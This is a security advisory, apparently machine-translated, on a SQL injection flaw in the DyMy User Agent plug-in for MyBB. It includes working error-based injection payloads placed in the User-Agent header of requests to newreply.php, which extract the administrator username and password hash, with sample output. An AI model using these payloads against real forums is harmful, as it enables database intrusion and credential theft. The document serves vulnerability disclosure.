MyBB DyMy User Agent SQL Injection Vulnerability

Release date:
Updated on:

Affected Systems:
MyBB dymy-user-agent
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56931

The DyMy User Agent plug-in can be used to place small browsers and OS badges in the post based on the User Agent string.

The MyBB DyMy User Agent (newreply. php) does not properly filter User-Agent Fields entered by users. The SQL injection vulnerability exists. Remote attackers can exploit this vulnerability to operate databases illegally.

<* Source: JoinSe7en

Link: http://www.exploit-db.com/exploits/23359/
Http://osvdb.org/88439
Http://secunia.com/advisories/51565/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Get administrator username:
POST http: // localhost/mybb/newreply. php? Ajax = 1

HTTP Headers:
Host: localhost
User-Agent: 'and (select 1 from (select count (*), concat (select username from mybb_users where uid = 1), floor (Rand (0) * 2 )) a from information_schema.tables group by a) B ));#

Output:

SQL Error:
1062-Duplicate entry 'admin1' for key' group _ key'

Obtain the administrator password:
POST http: // localhost/mybb/newreply. php? Ajax = 1

HTTP Headers:
Host: localhost
User-Agent: 'and (select 1 from (select count (*), concat (select password from mybb_users where uid = 1), floor (Rand (0) * 2 )) a from information_schema.tables group by a) B ));#

Output:
SQL Error:
1062-Duplicate entry '098f6bcd4621d373cade4e832627b4f6 'for key'group _ key'

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

MyBB
----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://mods.mybb.com/view/dymy-user-agent